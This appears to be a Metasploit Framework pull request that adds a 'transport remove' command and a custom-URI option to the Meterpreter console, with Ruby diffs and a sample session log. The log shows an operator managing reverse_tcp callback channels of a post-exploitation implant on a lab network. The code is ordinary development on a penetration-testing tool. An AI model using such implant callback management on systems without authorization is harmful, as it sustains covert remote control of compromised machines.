### PR TITLE
Implement transport remove

### DIFF
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -325,6 +325,16 @@ class ClientCore < Extension
     return Rex::Text.md5(mid)
   end
 
+  def transport_remove(opts={})
+    request = transport_prepare_request('core_transport_remove', opts)
+
+    return false unless request
+
+    client.send_request(request)
+
+    return true
+  end
+
   def transport_add(opts={})
     request = transport_prepare_request('core_transport_add', opts)
 

--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -658,8 +658,14 @@ class ClientCore < Extension
 
     # do more magic work for http(s) payloads
     unless opts[:transport].ends_with?('tcp')
-      sum = uri_checksum_lookup(:connect)
-      url << generate_uri_uuid(sum, opts[:uuid]) + '/'
+      if opts[:uri]
+        url << '/' unless opts[:uri].start_with?('/')
+        url << opts[:uri]
+        url << '/' unless opts[:uri].end_with?('/')
+      else
+        sum = uri_checksum_lookup(:connect)
+        url << generate_uri_uuid(sum, opts[:uuid]) + '/'
+      end
 
       # TODO: randomise if not specified?
       opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -561,13 +561,14 @@ class Console::CommandDispatcher::Core
   # Display help for transport management.
   #
   def cmd_transport_help
-    print_line('Usage: transport <list|change|add|next|prev> [options]')
+    print_line('Usage: transport <list|change|add|next|prev|remove> [options]')
     print_line
     print_line('   list: list the currently active transports.')
     print_line('    add: add a new transport to the transport list.')
     print_line(' change: same as add, but changes directly to the added entry.')
     print_line('   next: jump to the next transport in the list (no options).')
     print_line('   prev: jump to the previous transport in the list (no options).')
+    print_line(' remove: remove an existing, non-active transport.')
     print_line(@@transport_opts.usage)
   end
 
@@ -581,7 +582,7 @@ class Console::CommandDispatcher::Core
     end
 
     command = args.shift
-    unless ['list', 'add', 'change', 'prev', 'next'].include?(command)
+    unless ['list', 'add', 'change', 'prev', 'next', 'remove'].include?(command)
       cmd_transport_help
       return
     end
@@ -732,6 +733,13 @@ class Console::CommandDispatcher::Core
         print_good("Successfully added #{opts[:transport]} transport.")
       else
         print_error("Failed to add transport, please check the parameters")
+      end
+    when 'remove'
+      print_status("Removing transport ...")
+      if client.core.transport_remove(opts)
+        print_good("Successfully removed #{opts[:transport]} transport.")
+      else
+        print_error("Failed to remove transport, please check the parameters")
       end
     end
   end

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -543,12 +543,13 @@ class Console::CommandDispatcher::Core
     '-t'  => [ true,  "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.keys.join(', ')}" ],
     '-l'  => [ true,  'LHOST parameter (for reverse transports)' ],
     '-p'  => [ true,  'LPORT parameter' ],
-    '-ua' => [ true,  'User agent for http(s) transports (optional)' ],
-    '-ph' => [ true,  'Proxy host for http(s) transports (optional)' ],
-    '-pp' => [ true,  'Proxy port for http(s) transports (optional)' ],
-    '-pu' => [ true,  'Proxy username for http(s) transports (optional)' ],
-    '-ps' => [ true,  'Proxy password for http(s) transports (optional)' ],
-    '-pt' => [ true,  'Proxy type for http(s) transports (optional: http, socks; default: http)' ],
+    '-u'  => [ true,  'Custom URI for HTTP/S transports (used when removing transports)' ],
+    '-ua' => [ true,  'User agent for HTTP/S transports (optional)' ],
+    '-ph' => [ true,  'Proxy host for HTTP/S transports (optional)' ],
+    '-pp' => [ true,  'Proxy port for HTTP/S transports (optional)' ],
+    '-pu' => [ true,  'Proxy username for HTTP/S transports (optional)' ],
+    '-ps' => [ true,  'Proxy password for HTTP/S transports (optional)' ],
+    '-pt' => [ true,  'Proxy type for HTTP/S transports (optional: http, socks; default: http)' ],
     '-c'  => [ true,  'SSL certificate path for https transport verification (optional)' ],
     '-to' => [ true,  'Comms timeout (seconds) (default: same as current session)' ],
     '-ex' => [ true,  'Expiration timout (seconds) (default: same as current session)' ],
@@ -592,6 +593,7 @@ class Console::CommandDispatcher::Core
       :transport     => nil,
       :lhost         => nil,
       :lport         => nil,
+      :uri           => nil,
       :ua            => nil,
       :proxy_host    => nil,
       :proxy_port    => nil,
@@ -611,6 +613,8 @@ class Console::CommandDispatcher::Core
       case opt
       when '-c'
         opts[:cert] = val
+      when '-u'
+        opts[:uri] = val
       when '-ph'
         opts[:proxy_host] = val
       when '-pp'
@@ -735,6 +739,11 @@ class Console::CommandDispatcher::Core
         print_error("Failed to add transport, please check the parameters")
       end
     when 'remove'
+      if !opts[:transport].end_with?('_tcp') && opts[:uri].nil?
+        print_error("HTTP/S transport specified without session URI")
+        return
+      end
+
       print_status("Removing transport ...")
       if client.core.transport_remove(opts)
         print_good("Successfully removed #{opts[:transport]} transport.")


### PR DESCRIPTION
This PR adds support for transport removal using the `transport remove` command. The user can now add and remove transports on the fly, which is very helpful in the case of sleeping shells or shells that contain transports that callback on staged TCP listeners, resulting in metsrv being sent unnecessarily down the wire.

Removal of transports has the same interface as the addition as far as the `-l` `-p` and `-t` parameters go, this is so that things are consistent with the rest of the interface.

It is not possible to remove the currently active transport. This might come as a feature later on, but for now I felt it wasn't worth the extra accounting. If you want to remove a transport, you have to change transports first.

This PR requires Meterpreter changes, which can be found here: https://github.com/rapid7/meterpreter/pull/170
## Sample run

```
msf exploit(handler) > [*] Sending stage (1129522 bytes) to 172.16.52.1
[*] Meterpreter session 1 opened (172.16.52.1:6000 -> 172.16.52.1:53110) at 2015-06-16 11:53:57 +1000
WARNING: Local file /Users/oj/code/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /Users/oj/code/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > transport list
Session Expiry  : @ 2015-06-23 11:53:56

    Curr  URL                     Comms T/O  Retry Total  Retry Wait
    ----  ---                     ---------  -----------  ----------
    *     tcp://172.16.52.1:6000  300        3600         10

meterpreter > transport add -t reverse_tcp -l 172.16.52.1 -p 6005
[*] Adding new transport ...
[+] Successfully added reverse_tcp transport.
meterpreter > transport list
Session Expiry  : @ 2015-06-23 11:53:56

    Curr  URL                     Comms T/O  Retry Total  Retry Wait
    ----  ---                     ---------  -----------  ----------
    *     tcp://172.16.52.1:6000  300        3600         10
          tcp://172.16.52.1:6005  300        3600         10

meterpreter > transport next
[*] Changing to next transport ...
[+] Successfully changed to the next transport, killing current session.

[*] 172.16.255.164 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > [*] Meterpreter session 2 opened (172.16.52.1:6005 -> 172.16.52.1:53129) at 2015-06-16 11:55:43 +1000

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > transport list
Session Expiry  : @ 2015-06-23 11:53:56

    Curr  URL                     Comms T/O  Retry Total  Retry Wait
    ----  ---                     ---------  -----------  ----------
    *     tcp://172.16.52.1:6005  300        3600         10
          tcp://172.16.52.1:6000  300        3600         10

meterpreter > transport remove -t reverse_tcp -l 172.16.52.1 -p 6000
[*] Removing transport ...
[+] Successfully removed reverse_tcp transport.
meterpreter > transport list
Session Expiry  : @ 2015-06-23 11:53:56

    Curr  URL                     Comms T/O  Retry Total  Retry Wait
    ----  ---                     ---------  -----------  ----------
    *     tcp://172.16.52.1:6005  300        3600         10

meterpreter >
```
## Verification
- [x] Launch a meterpreter session.
- [x] Add 2 or more transports
- [x] Make sure they're in the transport list
- [x] delete one of the new ones, make sure it's deleted by looking at the transport list
- [x] change to one of the new transports
- [x] delete the original transport

It should all work as expected on both Windows and Posix.
